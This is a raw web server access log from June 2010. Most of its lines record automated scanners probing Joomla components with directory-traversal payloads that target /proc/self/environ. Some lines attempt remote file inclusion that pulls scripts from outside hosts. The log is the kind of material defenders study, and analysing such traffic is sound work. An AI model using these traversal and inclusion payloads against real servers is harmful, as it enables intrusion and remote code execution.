67.228.226.12 - - [12/Jun/2010:23:04:32 -0500] "GET //index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
89.200.169.108 - - [12/Jun/2010:23:04:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.200.169.108 - - [12/Jun/2010:23:04:56 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [12/Jun/2010:23:04:56 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.228.226.12 - - [12/Jun/2010:23:05:37 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.226.12 - - [12/Jun/2010:23:05:37 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [12/Jun/2010:23:06:27 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [12/Jun/2010:23:06:27 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [12/Jun/2010:23:06:27 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.59.156.163 - - [12/Jun/2010:23:06:43 -0500] "GET /logs/joomlapicasa2,option../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:23:06:43 -0500] "GET /joomlapicasa2,option../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 366 "-""libwww-perl/5.803"
67.228.226.12 - - [12/Jun/2010:23:06:48 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
67.228.226.12 - - [12/Jun/2010:23:06:48 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
67.59.156.163 - - [12/Jun/2010:23:08:24 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.59.156.163 - - [12/Jun/2010:23:08:24 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [12/Jun/2010:23:09:59 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.136.63.119 - - [12/Jun/2010:23:09:59 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.228.226.12 - - [12/Jun/2010:23:10:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.210.68.43 - - [12/Jun/2010:23:10:42 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
206.210.68.43 - - [12/Jun/2010:23:10:42 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
213.115.31.121 - - [12/Jun/2010:23:10:46 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
213.115.31.121 - - [12/Jun/2010:23:10:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
213.115.31.121 - - [12/Jun/2010:23:10:47 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
213.115.31.121 - - [12/Jun/2010:23:13:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
67.195.112.180 - - [12/Jun/2010:23:16:43 -0500] "GET /logs/access_log.1204416000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.251.10.117 - - [12/Jun/2010:23:17:27 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
64.251.10.117 - - [12/Jun/2010:23:17:28 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
64.251.10.117 - - [12/Jun/2010:23:17:28 -0500] "GET /logs/access_log.1274572800/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.195.112.180 - - [12/Jun/2010:23:18:07 -0500] "GET /logs/access_log.1237075200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.251.10.117 - - [12/Jun/2010:23:18:08 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
64.251.10.117 - - [12/Jun/2010:23:18:08 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
64.251.10.117 - - [12/Jun/2010:23:18:08 -0500] "GET /logs/access_log.1271721600/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
65.162.17.11 - - [12/Jun/2010:23:19:44 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:19:44 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:21:00 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:21:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:21:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
65.162.17.11 - - [12/Jun/2010:23:22:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:05 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:05 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:19 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:19 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:22:49 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:23:13 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:23:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:23:49 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:23:50 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:23:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:23:58 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:23:59 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:02 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:03 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:04 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:22 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:25 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:24:28 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
91.121.208.42 - - [12/Jun/2010:23:27:10 -0500] "GET /logs/index.php?option=com_hsconfig&controller=.../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.208.42 - - [12/Jun/2010:23:27:10 -0500] "GET /index.php?option=com_hsconfig&controller=.../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
88.191.94.188 - - [12/Jun/2010:23:28:42 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:28:42 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
219.240.36.36 - - [12/Jun/2010:23:29:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:23:29:01 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [12/Jun/2010:23:29:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
89.111.176.22 - - [12/Jun/2010:23:30:24 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
89.111.176.22 - - [12/Jun/2010:23:30:24 -0500] "GET /logs/?option=com_hsconfig&controller=.../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
89.111.176.22 - - [12/Jun/2010:23:30:24 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
89.111.176.22 - - [12/Jun/2010:23:30:24 -0500] "GET /?option=com_hsconfig&controller=.../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
67.195.112.180 - - [12/Jun/2010:23:34:18 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21829 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [12/Jun/2010:23:35:03 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.160.32.228 - - [12/Jun/2010:23:35:19 -0500] "GET /write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.160.32.228 - - [12/Jun/2010:23:35:19 -0500] "GET /logs/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
209.160.32.228 - - [12/Jun/2010:23:35:19 -0500] "GET /logs/access_log.1274572800%20%20/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
219.240.36.36 - - [12/Jun/2010:23:35:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
88.191.94.188 - - [12/Jun/2010:23:37:22 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:37:22 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:37:26 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.160.32.228 - - [12/Jun/2010:23:37:28 -0500] "GET /write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.160.32.228 - - [12/Jun/2010:23:37:28 -0500] "GET /logs/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
209.160.32.228 - - [12/Jun/2010:23:37:28 -0500] "GET /logs/access_log.1274572800%20%20/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [12/Jun/2010:23:37:50 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:37:50 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:37:51 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.160.32.228 - - [12/Jun/2010:23:39:25 -0500] "GET /logs/access_log.1274572800/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.160.32.228 - - [12/Jun/2010:23:41:52 -0500] "GET /logs/access_log.1274572800/write_update.php?board_skin_path=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.162.17.11 - - [12/Jun/2010:23:41:54 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.223.230.123 - - [12/Jun/2010:23:42:01 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.223.230.123 - - [12/Jun/2010:23:42:01 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
65.162.17.11 - - [12/Jun/2010:23:42:01 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.223.230.123 - - [12/Jun/2010:23:42:01 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.46.199.44 - - [12/Jun/2010:23:42:06 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.230.221.15 - - [12/Jun/2010:23:42:48 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.230.221.15 - - [12/Jun/2010:23:42:48 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.230.221.15 - - [12/Jun/2010:23:42:48 -0500] "GET /logs/access_log.1271462400//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [12/Jun/2010:23:42:52 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:42:52 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:42:53 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:43:28 -0500] "GET /logs/access_log.1274832000/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:43:29 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:43:29 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:43:47 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:43:47 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:43:47 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:44:01 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
65.162.17.11 - - [12/Jun/2010:23:44:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:44:02 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:44:02 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.145.96.12 - - [12/Jun/2010:23:44:21 -0500] "GET /logs/administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 359 "-""Mozilla/5.0"
194.145.96.12 - - [12/Jun/2010:23:44:21 -0500] "GET /administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 354 "-""Mozilla/5.0"
194.145.96.12 - - [12/Jun/2010:23:44:22 -0500] "GET /logs/access_log.1273363200/administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 381 "-""Mozilla/5.0"
